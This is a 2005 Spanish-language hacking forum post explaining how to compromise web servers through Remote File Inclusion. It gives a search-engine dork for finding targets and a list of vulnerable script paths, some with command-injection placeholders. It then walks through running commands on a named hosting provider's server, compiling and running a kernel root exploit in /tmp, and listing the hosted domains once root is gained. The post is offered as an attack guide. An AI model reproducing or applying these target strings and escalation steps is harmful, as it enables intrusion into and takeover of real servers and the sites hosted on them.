Remote File Inclusion II

**m0rpheus** · 13-04-2005 04:49 PM

Bueno voy a explicar como "Ownear" un server desde la tecnica Remote File Inclusion.

Como vimos la tecnica es sencilla,
/// HORROR! Necesitas registrarte antes de poder ver el contenido!REGISTRATE ACÁ!!! ///
[HACK BOX]

Osea que vamos a google o yahoo y ponemos allinurl: ".php?action=" nos va a mostrar todas las webs que usan index.php?action= ahi es donde nosotros le inyectamos codigo.

Ojo no todas las webs son vulnerables, nada mas las que usan la variable $GET y $CMD

Aca les dejo algunos strings para RFI

/ashnews.php?pathtoashnews=

/modules/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/shoutbox/expanded.php?conf=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/My_eGallery/public/displayCategory.php?basepath=

/yabbse/Sources/Packages.php?sourcedir=

/index.php?modpath=

/becommunity/community/index.php?from_market=Y&pageurl=

/becommunity/community/index.php?pageurl=

/index.php?sqld=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/modules/module_db.php?pivot_path=

/catalog/includes/include_once.php?include_file=

/cgi-bin/calendar.pl?command=login&fromTemplate=|cmd;here|

/live/inc/pipe.php?HCL_path=

/zb41/include/write.php?dir=

/cgi-bin/awstats.pl?update=1&logfile=|cmd;here|

/presse/stampa.php3?azione=

/inc/step_one_tables.php?server_inc=

/index.php?mainpage=

/phpprojekt/lib/authform.inc.php?path_pre=

/include/write.php?dir=

/pivot/modules/module_db.php?pivot_path=

/captionator.php?GALLERY_BASEDIR=

Bueno ya saben la tecnica, ahora falta saber como hackiar.

En el interprete de comandos que ponemos, hacemos un uname -a alli nos mostrara algo como.

Linux us4.toservers.com 2.6.11.6Escherichia-coli-picoso #5 Tue Apr 12 18
/// HORROR! Necesitas registrarte antes de poder ver el contenido!REGISTRATE ACÁ!!! ///
32 ART 2005 i686 unknown

Esa es la version de el Kernel, ese es uno de los 50 servers de Towebs.com en ese caso ese kernel rootea con un Exploit que se llama Krad, esta programado en C.

PAra compilar solo ponemos cd /tmp; gcc -o krad krad.c

Una ves compilado le damos permisos CHMOD 777 ( cd /tmp; chmod 777 krad )

Lo ejecutamos ( cd /tmp; ./krad )

Y si el kernel es vulnerable hacemos un id y nos mostrara uid=0(root) euid=0(root) guid=0(root)

Alli tenemos control total de el server.

La mayoria de las Web se encuentran alojadas en /home/user/public_html o /home/user/httpdocs luego tenemos las webs VHOST pero eso ya es aparte.

Una ves con root miramos los dominios que hay en ese server. Hacemos un

cat /etc/trueuserdomains

cat /etc/localuserdomains

Hay varios esos son los mas comunes que funcionan, nos va a tirar una lista

/// HORROR! Necesitas registrarte antes de poder ver el contenido!REGISTRATE ACÁ!!! ///

Osea que el user de towebs.com es toweb, por lo tanto la web de towebs estara hosteada en /home/towebs/public_html

Eso es lo mas basico de esta tecnica, es muy larga para explicar en 15 minutso como lo hago aca, pero por cualquier duda o si quieren saber mas, a partir de ahora estoy aca.

Tema: Remote File Inclusion II

LinkBack

Herramientas

Poné tu voto, hace valer la democracia 3k!

Remote File Inclusion II